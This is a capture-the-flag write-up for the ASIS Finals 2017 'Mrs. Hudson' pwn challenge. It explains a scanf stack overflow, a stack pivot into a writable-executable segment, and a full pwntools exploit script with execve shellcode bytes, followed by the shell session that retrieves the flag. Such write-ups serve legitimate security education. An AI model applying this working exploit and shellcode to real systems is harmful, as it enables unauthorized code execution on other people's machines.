ASIS Finals 2017 Mrs. Hudson Writeup

Solved by sherl0ck

In this challenge, the given binary was a non stripped 64-bit ELF executable.

Now, taking a look at the protections enabled :

gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial

So no protections are enabled. That’s handy !

The code of this binary is really simple. It basically calls scanf to read a string onto an address in the current stack frame. Since there is no bounds checking happening there is an obvious buffer overflow. So we can overwrite the saved rbp and rip. Since ASLR is enabled we can’t, directly, perform a ret2libc attack or execute a shellcode present in the stack.

Now notice that at run time there is a segment with read-write-execute permissions.

Start                  End                  Perm

0x00601000    0x00602000    rwxp

So my plan was to use stack pivot to the segment with the rwx permission and then call the scanf statement, enter shellcode and then return to the shellcode, as the addresses in this  segment are constant. So first let’s take a look at the scanf part :

0x000000000040066f : lea rax,[rbp-0x70]
0x0000000000400673 : mov rsi,rax
0x0000000000400676 : mov edi,0x40072b
0x000000000040067b : mov eax,0x0
0x0000000000400680 : call 0x400520
0x0000000000400685 : leave
0x0000000000400686 : ret

So here’s the way in which I exploited this binary :-

1. Overwrite saved rbp with an address in the r-w-x segment and saved rip with the address of scanf.
2. Send in the shellcode and give the return address as the address of the shellcode (i.e the rbp (given in the above step) – 0x70)

And here’s the python script for the exploit –

from pwn import *
import sys

if len(sys.argv)>1:
    r=remote('178.62.249.106',8642)
else:
    r=process('./mrs._hudson')

rbp1=0x6010e0       # this lies in the r-w-x segment
scanf=0x40066f      # <main +85>: lea rax,[rbp-0x70]
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

payload='A'*0x70    # junk
payload+=p64(rbp1)  # overwrite the saved rbp
payload+=p64(scanf) # overwrite the saved rip
r.sendline(payload)

'''
Now the rbp points to 0x6010e0 and rip to 0x40066f which sets the arguements for scanf.
After this the block of code with scanf and its arguements is executed again and we send the following as input.
'''

payload=fit({0:shellcode},filler='\x90',length=0x70) # shellcode followed by nop instruction
payload+="A"*8          # let the saved rbp be junk
payload+=p64(0x601070)  # let the saved rip be the address of shellcode i.e rbp-0x70 = 0x601070
r.sendline(payload)

'''
Now the value in rbp is 0x4141414141414141 and rip points to start of the shellcode.
After this block is executed the control shifts to shellcode thus executing it and giving a shell.
'''

r.interactive()      # get your shell

And here’s the shell :-

$python exploit.py 123
[+] Opening connection to 178.62.249.106 on port 8642: Done
[*] Switching to interactive mode
Let’s go back to 2000.
$ cd home/frontofficemanager/
$ ls
flag
hudson_3ab429dd29d62964e5596e6afe0d17d9
$ cat flag
ASIS{W3_Do0o_N0o0t_Like_M4N4G3RS_OR_D0_w3?}
$ exit

So, the flag is –

ASIS{W3_Do0o_N0o0t_Like_M4N4G3RS_OR_D0_w3?}